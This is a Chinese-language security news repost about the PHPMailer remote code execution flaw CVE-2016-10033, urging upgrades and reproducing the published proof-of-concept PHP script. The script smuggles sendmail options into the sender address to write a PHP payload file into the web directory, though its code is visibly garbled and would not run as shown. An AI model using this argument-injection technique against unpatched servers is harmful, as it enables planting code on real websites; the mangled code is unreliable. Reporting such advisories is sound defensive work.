Processing math: 100%

PHPMailer远程任意代码执行漏洞CVE-2016-10033 900万用户受影响 站长们要小心了

简介:

PHPMailer出现漏洞CVE-2016-10033,全球900万用户容易遭受远程攻击。官方目前已经发布新版本,请用户尽快升级。PHPMailer 5.2.18 之前所有版本都受到影响。CVE官方对于该漏洞的描述还处于 保留状态 

PHP Mailer是什么

PHPMailer,用于发送电子邮件的最受欢迎的开源 PHP 库之一,也是PHPMailer是一个用于发送电子邮件的PHP函数包。据估计,世界各地的超过 900 万用户利用此库。数以百万计的使用 PHP 和流行的 CMS,目前包括 WordPress,rupal 和 Joomla 网站使用库发送电子邮件。

PHPMailer远程任意代码执行漏洞CVE-2016-10033

该漏洞由安全专家 Dawid Golunski 从Legal Hacker网站上发布,远程未经身份验证的攻击者可以利用该漏洞,在 web 服务器的上下文中执行任意代码,攻击目标 web 应用程序。

"独立的研究发现了 PHPMailer,可以潜在地用于 (未经身份验证) 的远程攻击者,实现远程执行任意代码的上下文中的 web 服务器用户和远程破坏目标 web 应用程序中一个严重的漏洞"。Golunski 解释说。

"利用此漏洞的攻击者,可以攻击共用的网站组件,包括联系/反馈表单、 注册表单、 电子邮件的密码重置等,并利用 有漏洞版本的PHPMailer 类发送电子邮件"。

PoC (PHPMailer远程任意代码执行漏洞CVE-2016-10033)

这个漏洞的PoC代码已经公开。

<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail] 
Arg no. 1 == [-t] 
Arg no. 2 == [-i] 
Arg no. 3 == [-fattacker\] 
Arg no. 4 == [-oQ/tmp/] 
Arg no. 5 == [-X/var/www/cache/phpcode.php] 
Arg no. 6 == [some"@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
The resulting file will contain the payload passed in the body of the msg:
09607 <<< --b1_cb4566aa51be9f090d9419163e492306 
09607 <<< Content-Type: text/html; charset=us-ascii 
09607 <<< 
09607 <<< <?php phpinfo(); ?> 
09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
See the full advisory URL for details.
*/
// Attacker's input coming from untrusted source such as GET,_POST etc. 
// For example from a Contact form
emailfrom="attacker\"oQ/tmp/X/var/www/cache/phpcode.phpsome"@email.com;msg_body  = "<?php phpinfo(); ?>";
// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php'); 
$mail = new PHPMailer(); // defaults to using php "mail()"
mail>SetFrom(email_from, 'Client Name');
address="customerfeedback@companyX.com";mail->AddAddress($address, "Some User");
mail>Subject="PHPMailerPoCExploitCVE201610033";mail->MsgHTML($msg_body);
if(!mail->Send()) { 
     echo "Mailer Error: " .
mail->ErrorInfo; 
} else { 
echo "Message sent!\n"; 
}

据研究人员称,还开发了无身份验证 RCE 开发为一种流行开源代码部署的应用程序 (在互联网上超过 100 万的服务器上) 作为 PoC 真实开发。这个应该会在厂商修复漏洞之后公布。



原文发布时间: 2017年3月24日  
本文由:securityaffairs发布,版权归属于原作者
原文链接:http://toutiao.secjia.com/phpmailer-vulnerability-cve-2016-10033
本文来自云栖社区合作伙伴安全加,了解相关信息可以关注安全加网站
目录
打赏
0
0
0
0
192
分享
相关文章
如何确认网站是否有漏洞,如何找出网站存在的漏洞,找到漏洞该如何处理
如何确认网站是否有漏洞,如何找出网站存在的漏洞,找到漏洞该如何处理
如何确认网站是否有漏洞,如何找出网站存在的漏洞,找到漏洞该如何处理
【漏洞预警】CVE-2022-26134 Confluence 远程代码执行漏洞POC验证与修复过程
【漏洞预警】CVE-2022-26134 Confluence 远程代码执行漏洞POC验证与修复过程
802 0
【漏洞预警】CVE-2022-26134 Confluence 远程代码执行漏洞POC验证与修复过程
phpcms2008网站漏洞修复 远程代码写入缓存漏洞利用
SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客的攻击,关于这次发现的phpcms漏洞细节以及如何利用提权我们来详细剖析。
164 0
phpcms2008网站漏洞修复 远程代码写入缓存漏洞利用
ThinkPHP < 5.0.24 远程代码执行高危漏洞 修复方案
漏洞描述由于ThinkPHP5.0框架对Request类的method处理存在缺陷,导致黑客构造特定的请求,可直接GetWebShell。 漏洞评级严重 影响版本ThinkPHP 5.0系列 < 5.
25813 0
网站程序有漏洞怎么修复和查找漏洞
ecshop目前最新版本为4.0,是国内开源的一套商城系统,很多外贸公司,以及电商平台都在使用,正因为使用的人数较多,很多攻击者都在挖掘该网站的漏洞,就在最近ecshop被爆出高危漏洞,该漏洞利用跨站伪造函数,来对网站数据库进行攻击。
2335 0
【代码审计】任意文件删除漏洞实例
任意文件删除漏洞,该漏洞可让攻击者随意删除服务器上的任意文件。   环境搭建: CSCMS :http://www.chshcms.com/ 网站源码版本:Cscms_v4.1正式版(发布日期:2017-06-05) 程序源码下载:https://github.
1275 0
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等